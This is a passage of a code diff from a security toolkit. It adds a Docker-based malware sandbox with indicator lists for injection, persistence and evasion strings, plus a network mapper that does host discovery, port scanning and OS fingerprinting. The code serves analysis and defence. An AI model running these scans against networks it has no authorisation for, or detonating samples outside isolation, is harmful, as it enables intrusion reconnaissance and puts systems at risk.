||||
def get_timeline(self, hours: int = 24) -> List[Dict]:
|
||||
"""Get alert timeline grouped by hour."""
|
||||
timeline = defaultdict(lambda: {'count': 0, 'critical': 0, 'high': 0, 'medium': 0, 'low': 0})
|
||||
|
||||
for alert in self.alerts:
|
||||
ts = alert.get('timestamp', '')[:13] # YYYY-MM-DDTHH
|
||||
timeline[ts]['count'] += 1
|
||||
sev = alert.get('severity', 'low')
|
||||
timeline[ts][sev] = timeline[ts].get(sev, 0) + 1
|
||||
|
||||
return [{'hour': k, **v} for k, v in sorted(timeline.items())[-hours:]]
|
||||
|
||||
|
||||
# ── Singleton ────────────────────────────────────────────────────────────────
|
||||
|
||||
_instance = None
|
||||
|
||||
def get_log_correlator() -> LogCorrelator:
|
||||
global _instance
|
||||
if _instance is None:
|
||||
_instance = LogCorrelator()
|
||||
return _instance
|
||||
|
||||
|
||||
# ── CLI Interface ────────────────────────────────────────────────────────────
|
||||
|
||||
def run():
|
||||
"""CLI entry point for Log Correlator module."""
|
||||
engine = get_log_correlator()
|
||||
|
||||
while True:
|
||||
stats = engine.get_stats()
|
||||
print(f"\n{'='*60}")
|
||||
print(f" Log Correlator ({stats['total_logs']} logs, {stats['total_alerts']} alerts)")
|
||||
print(f"{'='*60}")
|
||||
print()
|
||||
print(" 1 — Ingest Log File")
|
||||
print(" 2 — Paste Log Text")
|
||||
print(" 3 — Search Logs")
|
||||
print(" 4 — View Alerts")
|
||||
print(" 5 — Manage Rules")
|
||||
print(" 6 — View Stats")
|
||||
print(" 7 — Alert Timeline")
|
||||
print(" 8 — Clear Alerts")
|
||||
print(" 0 — Back")
|
||||
print()
|
||||
|
||||
choice = input(" > ").strip()
|
||||
|
||||
if choice == '0':
|
||||
break
|
||||
elif choice == '1':
|
||||
filepath = input(" Log file path: ").strip()
|
||||
if filepath:
|
||||
result = engine.ingest_file(filepath)
|
||||
if result['ok']:
|
||||
print(f" Parsed {result['lines_parsed']} lines, "
|
||||
f"{result['alerts_generated']} alerts generated")
|
||||
else:
|
||||
print(f" Error: {result['error']}")
|
||||
elif choice == '2':
|
||||
print(" Paste log lines (blank line to finish):")
|
||||
lines = []
|
||||
while True:
|
||||
line = input()
|
||||
if not line:
|
||||
break
|
||||
lines.append(line)
|
||||
if lines:
|
||||
result = engine.ingest_text('\n'.join(lines))
|
||||
print(f" Parsed {result['lines_parsed']} lines, "
|
||||
f"{result['alerts_generated']} alerts")
|
||||
elif choice == '3':
|
||||
query = input(" Search query: ").strip()
|
||||
if query:
|
||||
results = engine.search_logs(query)
|
||||
print(f" {len(results)} matches:")
|
||||
for r in results[:10]:
|
||||
print(f" [{r.get('source_file', '?')}] {r.get('message', '')[:80]}")
|
||||
elif choice == '4':
|
||||
sev = input(" Severity filter (blank=all): ").strip() or None
|
||||
alerts = engine.get_alerts(severity=sev)
|
||||
for a in alerts[-15:]:
|
||||
print(f" [{a['severity']:<8}] {a['rule_name']}: {a['log_entry'][:60]}")
|
||||
elif choice == '5':
|
||||
rules = engine.get_rules()
|
||||
for r in rules:
|
||||
builtin = ' (built-in)' if r.get('builtin') else ''
|
||||
print(f" {r['id']}: {r['name']} [{r['severity']}]{builtin}")
|
||||
elif choice == '6':
|
||||
print(f" Logs: {stats['total_logs']}")
|
||||
print(f" Alerts: {stats['total_alerts']}")
|
||||
print(f" Sources: {stats['sources']}")
|
||||
print(f" Rules: {stats['rules']}")
|
||||
if stats['alerts_by_severity']:
|
||||
print(f" By severity: {stats['alerts_by_severity']}")
|
||||
elif choice == '7':
|
||||
timeline = engine.get_timeline()
|
||||
for t in timeline[-12:]:
|
||||
bar = '#' * min(t['count'], 40)
|
||||
print(f" {t['hour']} | {bar} ({t['count']})")
|
||||
elif choice == '8':
|
||||
engine.clear_alerts()
|
||||
print(" Alerts cleared")
|
||||
524
modules/malware_sandbox.py
Normal file
524
modules/malware_sandbox.py
Normal file
@ -0,0 +1,524 @@
|
||||
"""AUTARCH Malware Sandbox
|
||||
|
||||
Isolated sample detonation (Docker-based), behavior logging, API call tracing,
|
||||
network activity monitoring, and file system change tracking.
|
||||
"""
|
||||
|
||||
DESCRIPTION = "Malware detonation sandbox & analysis"
|
||||
AUTHOR = "darkHal"
|
||||
VERSION = "1.0"
|
||||
CATEGORY = "analyze"
|
||||
|
||||
import os
|
||||
import re
|
||||
import json
|
||||
import time
|
||||
import shutil
|
||||
import hashlib
|
||||
import subprocess
|
||||
import threading
|
||||
from pathlib import Path
|
||||
from datetime import datetime, timezone
|
||||
from typing import Dict, List, Optional, Any
|
||||
|
||||
try:
|
||||
from core.paths import find_tool, get_data_dir
|
||||
except ImportError:
|
||||
def find_tool(name):
|
||||
return shutil.which(name)
|
||||
def get_data_dir():
|
||||
return str(Path(__file__).parent.parent / 'data')
|
||||
|
||||
|
||||
# ── YARA Rules (basic) ──────────────────────────────────────────────────────
|
||||
|
||||
BASIC_YARA_INDICATORS = {
|
||||
'suspicious_imports': [
|
||||
b'CreateRemoteThread', b'VirtualAllocEx', b'WriteProcessMemory',
|
||||
b'NtQueryInformationProcess', b'IsDebuggerPresent',
|
||||
b'GetProcAddress', b'LoadLibraryA', b'ShellExecuteA',
|
||||
],
|
||||
'crypto_indicators': [
|
||||
b'CryptEncrypt', b'CryptDecrypt', b'BCryptEncrypt',
|
||||
b'AES', b'RSA', b'BEGIN PUBLIC KEY',
|
||||
],
|
||||
'network_indicators': [
|
||||
b'InternetOpenA', b'HttpOpenRequestA', b'URLDownloadToFile',
|
||||
b'WSAStartup', b'connect', b'send', b'recv',
|
||||
b'http://', b'https://', b'ftp://',
|
||||
],
|
||||
'persistence_indicators': [
|
||||
b'CurrentVersion\\Run', b'SOFTWARE\\Microsoft\\Windows\\CurrentVersion',
|
||||
b'schtasks', b'at.exe', b'HKEY_LOCAL_MACHINE', b'HKEY_CURRENT_USER',
|
||||
b'crontab', b'/etc/cron',
|
||||
],
|
||||
'evasion_indicators': [
|
||||
b'IsDebuggerPresent', b'CheckRemoteDebuggerPresent',
|
||||
b'NtSetInformationThread', b'vmware', b'virtualbox', b'vbox',
|
||||
b'sandbox', b'SbieDll.dll',
|
||||
],
|
||||
}
|
||||
|
||||
|
||||
# ── Sandbox Engine ───────────────────────────────────────────────────────────
|
||||
|
||||
class MalwareSandbox:
|
||||
"""Isolated malware analysis environment."""
|
||||
|
||||
def __init__(self):
|
||||
self.data_dir = os.path.join(get_data_dir(), 'sandbox')
|
||||
os.makedirs(self.data_dir, exist_ok=True)
|
||||
self.samples_dir = os.path.join(self.data_dir, 'samples')
|
||||
os.makedirs(self.samples_dir, exist_ok=True)
|
||||
self.reports_dir = os.path.join(self.data_dir, 'reports')
|
||||
os.makedirs(self.reports_dir, exist_ok=True)
|
||||
|
||||
self.docker = find_tool('docker') or shutil.which('docker')
|
||||
self.strace = shutil.which('strace')
|
||||
self.ltrace = shutil.which('ltrace')
|
||||
self.file_cmd = shutil.which('file')
|
||||
self.strings_cmd = find_tool('strings') or shutil.which('strings')
|
||||
|
||||
self.analyses: List[Dict] = []
|
||||
self._jobs: Dict[str, Dict] = {}
|
||||
|
||||
def get_status(self) -> Dict:
|
||||
"""Get sandbox capabilities."""
|
||||
docker_ok = False
|
||||
if self.docker:
|
||||
try:
|
||||
result = subprocess.run([self.docker, 'info'],
|
||||
capture_output=True, timeout=5)
|
||||
docker_ok = result.returncode == 0
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
return {
|
||||
'docker': docker_ok,
|
||||
'strace': self.strace is not None,
|
||||
'ltrace': self.ltrace is not None,
|
||||
'file': self.file_cmd is not None,
|
||||
'strings': self.strings_cmd is not None,
|
||||
'samples': len(list(Path(self.samples_dir).iterdir())),
|
||||
'analyses': len(self.analyses)
|
||||
}
|
||||
|
||||
# ── Sample Management ────────────────────────────────────────────────
|
||||
|
||||
def submit_sample(self, filepath: str, name: str = None) -> Dict:
|
||||
"""Submit a sample for analysis."""
|
||||
if not os.path.exists(filepath):
|
||||
return {'ok': False, 'error': 'File not found'}
|
||||
|
||||
# Hash the sample
|
||||
hashes = {}
|
||||
with open(filepath, 'rb') as f:
|
||||
data = f.read()
|
||||
hashes['md5'] = hashlib.md5(data).hexdigest()
|
||||
hashes['sha1'] = hashlib.sha1(data).hexdigest()
|
||||
hashes['sha256'] = hashlib.sha256(data).hexdigest()
|
||||
|
||||
# Copy to samples dir
|
||||
sample_name = name or Path(filepath).name
|
||||
safe_name = re.sub(r'[^\w.\-]', '_', sample_name)
|
||||
dest = os.path.join(self.samples_dir, f'{hashes["sha256"][:16]}_{safe_name}')
|
||||
shutil.copy2(filepath, dest)
|
||||
|
||||
sample = {
|
||||
'name': sample_name,
|
||||
'path': dest,
|
||||
'size': os.path.getsize(dest),
|
||||
'hashes': hashes,
|
||||
'submitted': datetime.now(timezone.utc).isoformat()
|
||||
}
|
||||
|
||||
return {'ok': True, 'sample': sample}
|
||||
|
||||
def list_samples(self) -> List[Dict]:
|
||||
"""List submitted samples."""
|
||||
samples = []
|
||||
for f in Path(self.samples_dir).iterdir():
|
||||
if f.is_file():
|
||||
samples.append({
|
||||
'name': f.name,
|
||||
'path': str(f),
|
||||
'size': f.stat().st_size,
|
||||
'modified': datetime.fromtimestamp(f.stat().st_mtime, timezone.utc).isoformat()
|
||||
})
|
||||
return samples
|
||||
|
||||
# ── Static Analysis ──────────────────────────────────────────────────
|
||||
|
||||
def static_analysis(self, filepath: str) -> Dict:
|
||||
"""Perform static analysis on a sample."""
|
||||
if not os.path.exists(filepath):
|
||||
return {'ok': False, 'error': 'File not found'}
|
||||
|
||||
result = {
|
||||
'ok': True,
|
||||
'file': filepath,
|
||||
'name': Path(filepath).name,
|
||||
'size': os.path.getsize(filepath)
|
||||
}
|
||||
|
||||
# File type identification
|
||||
if self.file_cmd:
|
||||
try:
|
||||
out = subprocess.check_output([self.file_cmd, filepath],
|
||||
text=True, timeout=10)
|
||||
result['file_type'] = out.split(':', 1)[-1].strip()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# Hashes
|
||||
with open(filepath, 'rb') as f:
|
||||
data = f.read()
|
||||
result['hashes'] = {
|
||||
'md5': hashlib.md5(data).hexdigest(),
|
||||
'sha1': hashlib.sha1(data).hexdigest(),
|
||||
'sha256': hashlib.sha256(data).hexdigest()
|
||||
}
|
||||
|
||||
# Strings extraction
|
||||
if self.strings_cmd:
|
||||
try:
|
||||
out = subprocess.check_output(
|
||||
[self.strings_cmd, '-n', '6', filepath],
|
||||
text=True, timeout=30, stderr=subprocess.DEVNULL
|
||||
)
|
||||
strings = out.strip().split('\n')
|
||||
result['strings_count'] = len(strings)
|
||||
|
||||
# Extract interesting strings
|
||||
urls = [s for s in strings if re.match(r'https?://', s)]
|
||||
ips = [s for s in strings if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', s)]
|
||||
emails = [s for s in strings if re.match(r'[^@]+@[^@]+\.[^@]+', s)]
|
||||
paths = [s for s in strings if s.startswith('/') or '\\' in s]
|
||||
|
||||
result['interesting_strings'] = {
|
||||
'urls': urls[:20],
|
||||
'ips': list(set(ips))[:20],
|
||||
'emails': list(set(emails))[:10],
|
||||
'paths': paths[:20]
|
||||
}
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# YARA-like signature matching
|
||||
indicators = {}
|
||||
for category, patterns in BASIC_YARA_INDICATORS.items():
|
||||
matches = [p.decode('utf-8', errors='replace') for p in patterns if p in data]
|
||||
if matches:
|
||||
indicators[category] = matches
|
||||
|
||||
result['indicators'] = indicators
|
||||
result['indicator_count'] = sum(len(v) for v in indicators.values())
|
||||
|
||||
# PE header analysis
|
||||
if data[:2] == b'MZ':
|
||||
result['pe_info'] = self._parse_pe_header(data)
|
||||
|
||||
# ELF header analysis
|
||||
if data[:4] == b'\x7fELF':
|
||||
result['elf_info'] = self._parse_elf_header(data)
|
||||
|
||||
# Risk score
|
||||
score = 0
|
||||
if indicators.get('evasion_indicators'):
|
||||
score += 30
|
||||
if indicators.get('persistence_indicators'):
|
||||
score += 25
|
||||
if indicators.get('suspicious_imports'):
|
||||
score += 20
|
||||
if indicators.get('network_indicators'):
|
||||
score += 15
|
||||
if indicators.get('crypto_indicators'):
|
||||
score += 10
|
||||
|
||||
result['risk_score'] = min(100, score)
|
||||
result['risk_level'] = (
|
||||
'critical' if score >= 70 else
|
||||
'high' if score >= 50 else
|
||||
'medium' if score >= 30 else
|
||||
'low' if score >= 10 else
|
||||
'clean'
|
||||
)
|
||||
|
||||
return result
|
||||
|
||||
def _parse_pe_header(self, data: bytes) -> Dict:
|
||||
"""Basic PE header parsing."""
|
||||
info = {'format': 'PE'}
|
||||
try:
|
||||
import struct
|
||||
e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
|
||||
if data[e_lfanew:e_lfanew+4] == b'PE\x00\x00':
|
||||
machine = struct.unpack_from('<H', data, e_lfanew + 4)[0]
|
||||
info['machine'] = {0x14c: 'i386', 0x8664: 'x86_64', 0x1c0: 'ARM'}.get(machine, hex(machine))
|
||||
num_sections = struct.unpack_from('<H', data, e_lfanew + 6)[0]
|
||||
info['sections'] = num_sections
|
||||
timestamp = struct.unpack_from('<I', data, e_lfanew + 8)[0]
|
||||
info['compile_time'] = datetime.fromtimestamp(timestamp, timezone.utc).isoformat()
|
||||
except Exception:
|
||||
pass
|
||||
return info
|
||||
|
||||
def _parse_elf_header(self, data: bytes) -> Dict:
|
||||
"""Basic ELF header parsing."""
|
||||
info = {'format': 'ELF'}
|
||||
try:
|
||||
import struct
|
||||
ei_class = data[4]
|
||||
info['bits'] = {1: 32, 2: 64}.get(ei_class, 0)
|
||||
ei_data = data[5]
|
||||
info['endian'] = {1: 'little', 2: 'big'}.get(ei_data, 'unknown')
|
||||
e_type = struct.unpack_from('<H', data, 16)[0]
|
||||
info['type'] = {1: 'relocatable', 2: 'executable', 3: 'shared', 4: 'core'}.get(e_type, str(e_type))
|
||||
except Exception:
|
||||
pass
|
||||
return info
|
||||
|
||||
# ── Dynamic Analysis (Docker) ────────────────────────────────────────
|
||||
|
||||
def dynamic_analysis(self, filepath: str, timeout: int = 60) -> str:
|
||||
"""Run sample in Docker sandbox. Returns job_id."""
|
||||
if not self.docker:
|
||||
return ''
|
||||
|
||||
job_id = f'sandbox_{int(time.time())}'
|
||||
self._jobs[job_id] = {
|
||||
'type': 'dynamic', 'status': 'running',
|
||||
'result': None, 'started': time.time()
|
||||
}
|
||||
|
||||
def _run():
|
||||
try:
|
||||
container_name = f'autarch_sandbox_{job_id}'
|
||||
sample_name = Path(filepath).name
|
||||
|
||||
# Run in isolated container
|
||||
cmd = [
|
||||
self.docker, 'run', '--rm',
|
||||
'--name', container_name,
|
||||
'--network', 'none', # No network
|
||||
'--memory', '256m', # Memory limit
|
||||
'--cpus', '1', # CPU limit
|
||||
'--read-only', # Read-only root
|
||||
'--tmpfs', '/tmp:size=64m',
|
||||
'-v', f'{os.path.abspath(filepath)}:/sample/{sample_name}:ro',
|
||||
'ubuntu:22.04',
|
||||
'bash', '-c', f'''
|
||||
# Log file operations
|
||||
cp /sample/{sample_name} /tmp/test_sample
|
||||
chmod +x /tmp/test_sample 2>/dev/null
|
||||
# Try to run with strace if available
|
||||
timeout {timeout} strace -f -o /tmp/trace.log /tmp/test_sample 2>/tmp/stderr.log || true
|
||||
cat /tmp/trace.log 2>/dev/null | head -1000
|
||||
echo "---STDERR---"
|
||||
cat /tmp/stderr.log 2>/dev/null | head -100
|
||||
'''
|
||||
]
|
||||
|
||||
result = subprocess.run(cmd, capture_output=True, text=True,
|
||||
timeout=timeout + 30)
|
||||
|
||||
# Parse strace output
|
||||
syscalls = {}
|
||||
files_accessed = []
|
||||
network_calls = []
|
||||
|
||||
for line in result.stdout.split('\n'):
|
||||
# Count syscalls
|
||||
sc_match = re.match(r'.*?(\w+)\(', line)
|
||||
if sc_match:
|
||||
sc = sc_match.group(1)
|
||||
syscalls[sc] = syscalls.get(sc, 0) + 1
|
||||
|
||||
# File access
|
||||
if 'open(' in line or 'openat(' in line:
|
||||
f_match = re.search(r'"([^"]+)"', line)
|
||||
if f_match:
|
||||
files_accessed.append(f_match.group(1))
|
||||
|
||||
# Network
|
||||
if 'connect(' in line or 'socket(' in line:
|
||||
network_calls.append(line.strip()[:100])
|
||||
|
||||
self._jobs[job_id]['status'] = 'complete'
|
||||
self._jobs[job_id]['result'] = {
|
||||
'ok': True,
|
||||
'syscalls': syscalls,
|
||||
'syscall_count': sum(syscalls.values()),
|
||||
'files_accessed': list(set(files_accessed))[:50],
|
||||
'network_calls': network_calls[:20],
|
||||
'exit_code': result.returncode,
|
||||
'stderr': result.stderr[:500] if result.stderr else ''
|
||||
}
|
||||
|
||||
except subprocess.TimeoutExpired:
|
||||
# Kill container
|
||||
subprocess.run([self.docker, 'kill', container_name],
|
||||
capture_output=True)
|
||||
self._jobs[job_id]['status'] = 'complete'
|
||||
self._jobs[job_id]['result'] = {
|
||||
'ok': True, 'timeout': True,
|
||||
'message': 'Analysis timed out (sample may be long-running)'
|
||||
}
|
||||
except Exception as e:
|
||||
self._jobs[job_id]['status'] = 'error'
|
||||
self._jobs[job_id]['result'] = {'ok': False, 'error': str(e)}
|
||||
|
||||
threading.Thread(target=_run, daemon=True).start()
|
||||
return job_id
|
||||
|
||||
# ── Report Generation ────────────────────────────────────────────────
|
||||
|
||||
def generate_report(self, filepath: str, include_dynamic: bool = False) -> Dict:
|
||||
"""Generate comprehensive analysis report."""
|
||||
static = self.static_analysis(filepath)
|
||||
report = {
|
||||
'timestamp': datetime.now(timezone.utc).isoformat(),
|
||||
'sample': {
|
||||
'name': Path(filepath).name,
|
||||
'path': filepath,
|
||||
'size': static.get('size', 0),
|
||||
'hashes': static.get('hashes', {})
|
||||
},
|
||||
'static_analysis': static,
|
||||
'risk_score': static.get('risk_score', 0),
|
||||
'risk_level': static.get('risk_level', 'unknown')
|
||||
}
|
||||
|
||||
# Save report
|
||||
report_name = f'report_{static.get("hashes", {}).get("sha256", "unknown")[:16]}.json'
|
||||
report_path = os.path.join(self.reports_dir, report_name)
|
||||
with open(report_path, 'w') as f:
|
||||
json.dump(report, f, indent=2)
|
||||
|
||||
report['report_path'] = report_path
|
||||
self.analyses.append({
|
||||
'name': Path(filepath).name,
|
||||
'report': report_path,
|
||||
'risk': report['risk_level'],
|
||||
'timestamp': report['timestamp']
|
||||
})
|
||||
|
||||
return {'ok': True, **report}
|
||||
|
||||
def list_reports(self) -> List[Dict]:
|
||||
"""List analysis reports."""
|
||||
reports = []
|
||||
for f in Path(self.reports_dir).glob('*.json'):
|
||||
try:
|
||||
with open(f) as fh:
|
||||
data = json.load(fh)
|
||||
reports.append({
|
||||
'name': f.name,
|
||||
'path': str(f),
|
||||
'sample': data.get('sample', {}).get('name', ''),
|
||||
'risk': data.get('risk_level', 'unknown'),
|
||||
'timestamp': data.get('timestamp', '')
|
||||
})
|
||||
except Exception:
|
||||
pass
|
||||
return reports
|
||||
|
||||
# ── Job Management ───────────────────────────────────────────────────
|
||||
|
||||
def get_job(self, job_id: str) -> Optional[Dict]:
|
||||
return self._jobs.get(job_id)
|
||||
|
||||
|
||||
# ── Singleton ────────────────────────────────────────────────────────────────
|
||||
|
||||
_instance = None
|
||||
|
||||
def get_sandbox() -> MalwareSandbox:
|
||||
global _instance
|
||||
if _instance is None:
|
||||
_instance = MalwareSandbox()
|
||||
return _instance
|
||||
|
||||
|
||||
# ── CLI Interface ────────────────────────────────────────────────────────────
|
||||
|
||||
def run():
|
||||
"""CLI entry point for Malware Sandbox module."""
|
||||
sandbox = get_sandbox()
|
||||
|
||||
while True:
|
||||
status = sandbox.get_status()
|
||||
print(f"\n{'='*60}")
|
||||
print(f" Malware Sandbox")
|
||||
print(f"{'='*60}")
|
||||
print(f" Docker: {'OK' if status['docker'] else 'NOT AVAILABLE'}")
|
||||
print(f" Samples: {status['samples']} Analyses: {status['analyses']}")
|
||||
print()
|
||||
print(" 1 — Submit Sample")
|
||||
print(" 2 — Static Analysis")
|
||||
print(" 3 — Dynamic Analysis (Docker)")
|
||||
print(" 4 — Full Report")
|
||||
print(" 5 — List Samples")
|
||||
print(" 6 — List Reports")
|
||||
print(" 0 — Back")
|
||||
print()
|
||||
|
||||
choice = input(" > ").strip()
|
||||
|
||||
if choice == '0':
|
||||
break
|
||||
elif choice == '1':
|
||||
path = input(" File path: ").strip()
|
||||
if path:
|
||||
result = sandbox.submit_sample(path)
|
||||
if result['ok']:
|
||||
s = result['sample']
|
||||
print(f" Submitted: {s['name']} ({s['size']} bytes)")
|
||||
print(f" SHA256: {s['hashes']['sha256']}")
|
||||
else:
|
||||
print(f" Error: {result['error']}")
|
||||
elif choice == '2':
|
||||
path = input(" Sample path: ").strip()
|
||||
if path:
|
||||
result = sandbox.static_analysis(path)
|
||||
if result['ok']:
|
||||
print(f" Type: {result.get('file_type', 'unknown')}")
|
||||
print(f" Risk: {result['risk_level']} ({result['risk_score']}/100)")
|
||||
print(f" Strings: {result.get('strings_count', 0)}")
|
||||
for cat, matches in result.get('indicators', {}).items():
|
||||
print(f" {cat}: {', '.join(matches[:5])}")
|
||||
else:
|
||||
print(f" Error: {result['error']}")
|
||||
elif choice == '3':
|
||||
if not status['docker']:
|
||||
print(" Docker not available")
|
||||
continue
|
||||
path = input(" Sample path: ").strip()
|
||||
if path:
|
||||
job_id = sandbox.dynamic_analysis(path)
|
||||
print(f" Running in sandbox (job: {job_id})...")
|
||||
while True:
|
||||
job = sandbox.get_job(job_id)
|
||||
if job['status'] != 'running':
|
||||
r = job['result']
|
||||
if r.get('ok'):
|
||||
print(f" Syscalls: {r.get('syscall_count', 0)}")
|
||||
print(f" Files: {len(r.get('files_accessed', []))}")
|
||||
print(f" Network: {len(r.get('network_calls', []))}")
|
||||
else:
|
||||
print(f" Error: {r.get('error', 'Unknown')}")
|
||||
break
|
||||
time.sleep(2)
|
||||
elif choice == '4':
|
||||
path = input(" Sample path: ").strip()
|
||||
if path:
|
||||
result = sandbox.generate_report(path)
|
||||
if result['ok']:
|
||||
print(f" Report: {result['report_path']}")
|
||||
print(f" Risk: {result['risk_level']} ({result['risk_score']}/100)")
|
||||
elif choice == '5':
|
||||
for s in sandbox.list_samples():
|
||||
print(f" {s['name']} ({s['size']} bytes)")
|
||||
elif choice == '6':
|
||||
for r in sandbox.list_reports():
|
||||
print(f" [{r['risk']}] {r['sample']} {r['timestamp'][:19]}")
|
||||
509
modules/net_mapper.py
Normal file
509
modules/net_mapper.py
Normal file
@ -0,0 +1,509 @@
|
||||
"""AUTARCH Network Topology Mapper
|
||||
|
||||
Host discovery, service enumeration, OS fingerprinting, and visual
|
||||
network topology mapping with scan diffing.
|
||||
"""
|
||||
|
||||
DESCRIPTION = "Network topology discovery & mapping"
|
||||
AUTHOR = "darkHal"
|
||||
VERSION = "1.0"
|
||||
CATEGORY = "analyze"
|
||||
|
||||
import os
|
||||
import re
|
||||
import json
|
||||
import time
|
||||
import socket
|
||||
import struct
|
||||
import threading
|
||||
import subprocess
|
||||
from pathlib import Path
|
||||
from datetime import datetime, timezone
|
||||
from typing import Dict, List, Optional, Any
|
||||
from dataclasses import dataclass, field
|
||||
|
||||
try:
|
||||
from core.paths import find_tool, get_data_dir
|
||||
except ImportError:
|
||||
import shutil
|
||||
def find_tool(name):
|
||||
return shutil.which(name)
|
||||
def get_data_dir():
|
||||
return str(Path(__file__).parent.parent / 'data')
|
||||
|
||||
|
||||
@dataclass
|
||||
class Host:
|
||||
ip: str
|
||||
mac: str = ''
|
||||
hostname: str = ''
|
||||
os_guess: str = ''
|
||||
ports: List[dict] = field(default_factory=list)
|
||||
state: str = 'up'
|
||||
subnet: str = ''
|
||||
|
||||
def to_dict(self) -> dict:
|
||||
return {
|
||||
'ip': self.ip, 'mac': self.mac, 'hostname': self.hostname,
|
||||
'os_guess': self.os_guess, 'ports': self.ports,
|
||||
'state': self.state, 'subnet': self.subnet,
|
||||
}
|
||||
|
||||
|
||||
class NetMapper:
|
||||
"""Network topology discovery and mapping."""
|
||||
|
||||
def __init__(self):
|
||||
self._data_dir = os.path.join(get_data_dir(), 'net_mapper')
|
||||
os.makedirs(self._data_dir, exist_ok=True)
|
||||
self._active_jobs: Dict[str, dict] = {}
|
||||
|
||||
# ── Host Discovery ────────────────────────────────────────────────────
|
||||
|
||||
def discover_hosts(self, target: str, method: str = 'auto',
|
||||
timeout: float = 3.0) -> dict:
|
||||
"""Discover live hosts on a network.
|
||||
|
||||
target: IP, CIDR (192.168.1.0/24), or range (192.168.1.1-254)
|
||||
method: 'arp', 'icmp', 'tcp', 'nmap', 'auto'
|
||||
"""
|
||||
job_id = f'discover_{int(time.time())}'
|
||||
holder = {'done': False, 'hosts': [], 'error': None}
|
||||
self._active_jobs[job_id] = holder
|
||||
|
||||
def do_discover():
|
||||
try:
|
||||
nmap = find_tool('nmap')
|
||||
if method == 'nmap' or (method == 'auto' and nmap):
|
||||
hosts = self._nmap_discover(target, nmap, timeout)
|
||||
elif method == 'icmp' or method == 'auto':
|
||||
hosts = self._ping_sweep(target, timeout)
|
||||
elif method == 'tcp':
|
||||
hosts = self._tcp_discover(target, timeout)
|
||||
else:
|
||||
hosts = self._ping_sweep(target, timeout)
|
||||
holder['hosts'] = [h.to_dict() for h in hosts]
|
||||
except Exception as e:
|
||||
holder['error'] = str(e)
|
||||
finally:
|
||||
holder['done'] = True
|
||||
|
||||
threading.Thread(target=do_discover, daemon=True).start()
|
||||
return {'ok': True, 'job_id': job_id}
|
||||
|
||||
def _nmap_discover(self, target: str, nmap: str, timeout: float) -> List[Host]:
|
||||
"""Discover hosts using nmap."""
|
||||
cmd = [nmap, '-sn', '-PE', '-PA21,22,80,443,445,3389', '-oX', '-', target]
|
||||
try:
|
||||
result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
|
||||
return self._parse_nmap_xml(result.stdout)
|
||||
except Exception:
|
||||
return []
|
||||
|
||||
def _ping_sweep(self, target: str, timeout: float) -> List[Host]:
|
||||
"""ICMP ping sweep."""
|
||||
ips = self._expand_target(target)
|
||||
hosts = []
|
||||
lock = threading.Lock()
|
||||
|
||||
def ping(ip):
|
||||
try:
|
||||
# Use socket instead of subprocess for speed
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.settimeout(timeout)
|
||||
# Try common ports to detect hosts even if ICMP is blocked
|
||||
for port in (80, 443, 22, 445):
|
||||
try:
|
||||
r = s.connect_ex((ip, port))
|
||||
if r == 0:
|
||||
h = Host(ip=ip, state='up',
|
||||
subnet='.'.join(ip.split('.')[:3]) + '.0/24')
|
||||
try:
|
||||
h.hostname = socket.getfqdn(ip)
|
||||
if h.hostname == ip:
|
||||
h.hostname = ''
|
||||
except Exception:
|
||||
pass
|
||||
with lock:
|
||||
hosts.append(h)
|
||||
s.close()
|
||||
return
|
||||
except Exception:
|
||||
pass
|
||||
s.close()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
threads = []
|
||||
for ip in ips:
|
||||
t = threading.Thread(target=ping, args=(ip,), daemon=True)
|
||||
threads.append(t)
|
||||
t.start()
|
||||
if len(threads) >= 100:
|
||||
for t in threads:
|
||||
t.join(timeout=timeout + 2)
|
||||
threads.clear()
|
||||
for t in threads:
|
||||
t.join(timeout=timeout + 2)
|
||||
|
||||
return sorted(hosts, key=lambda h: [int(x) for x in h.ip.split('.')])
|
||||
|
||||
def _tcp_discover(self, target: str, timeout: float) -> List[Host]:
|
||||
"""TCP SYN scan for discovery."""
|
||||
return self._ping_sweep(target, timeout) # Same logic for now
|
||||
|
||||
# ── Port Scanning ─────────────────────────────────────────────────────
|
||||
|
||||
def scan_host(self, ip: str, port_range: str = '1-1024',
|
||||
service_detection: bool = True,
|
||||
os_detection: bool = True) -> dict:
|
||||
"""Detailed scan of a single host."""
|
||||
nmap = find_tool('nmap')
|
||||
if nmap:
|
||||
return self._nmap_scan_host(ip, nmap, port_range,
|
||||
service_detection, os_detection)
|
||||
return self._socket_scan_host(ip, port_range)
|
||||
|
||||
def _nmap_scan_host(self, ip: str, nmap: str, port_range: str,
|
||||
svc: bool, os_det: bool) -> dict:
|
||||
cmd = [nmap, '-Pn', '-p', port_range, '-oX', '-', ip]
|
||||
if svc:
|
||||
cmd.insert(2, '-sV')
|
||||
if os_det:
|
||||
cmd.insert(2, '-O')
|
||||
try:
|
||||
result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
|
||||
hosts = self._parse_nmap_xml(result.stdout)
|
||||
if hosts:
|
||||
return {'ok': True, 'host': hosts[0].to_dict(), 'raw': result.stdout}
|
||||
return {'ok': True, 'host': Host(ip=ip, state='unknown').to_dict()}
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
def _socket_scan_host(self, ip: str, port_range: str) -> dict:
|
||||
"""Fallback socket-based port scan."""
|
||||
start_port, end_port = 1, 1024
|
||||
if '-' in port_range:
|
||||
parts = port_range.split('-')
|
||||
start_port, end_port = int(parts[0]), int(parts[1])
|
||||
|
||||
open_ports = []
|
||||
for port in range(start_port, min(end_port + 1, 65536)):
|
||||
try:
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.settimeout(1)
|
||||
if s.connect_ex((ip, port)) == 0:
|
||||
open_ports.append({
|
||||
'port': port, 'protocol': 'tcp', 'state': 'open',
|
||||
'service': self._guess_service(port),
|
||||
})
|
||||
s.close()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
host = Host(ip=ip, state='up', ports=open_ports,
|
||||
subnet='.'.join(ip.split('.')[:3]) + '.0/24')
|
||||
return {'ok': True, 'host': host.to_dict()}
|
||||
|
||||
# ── Topology / Scan Management ────────────────────────────────────────
|
||||
|
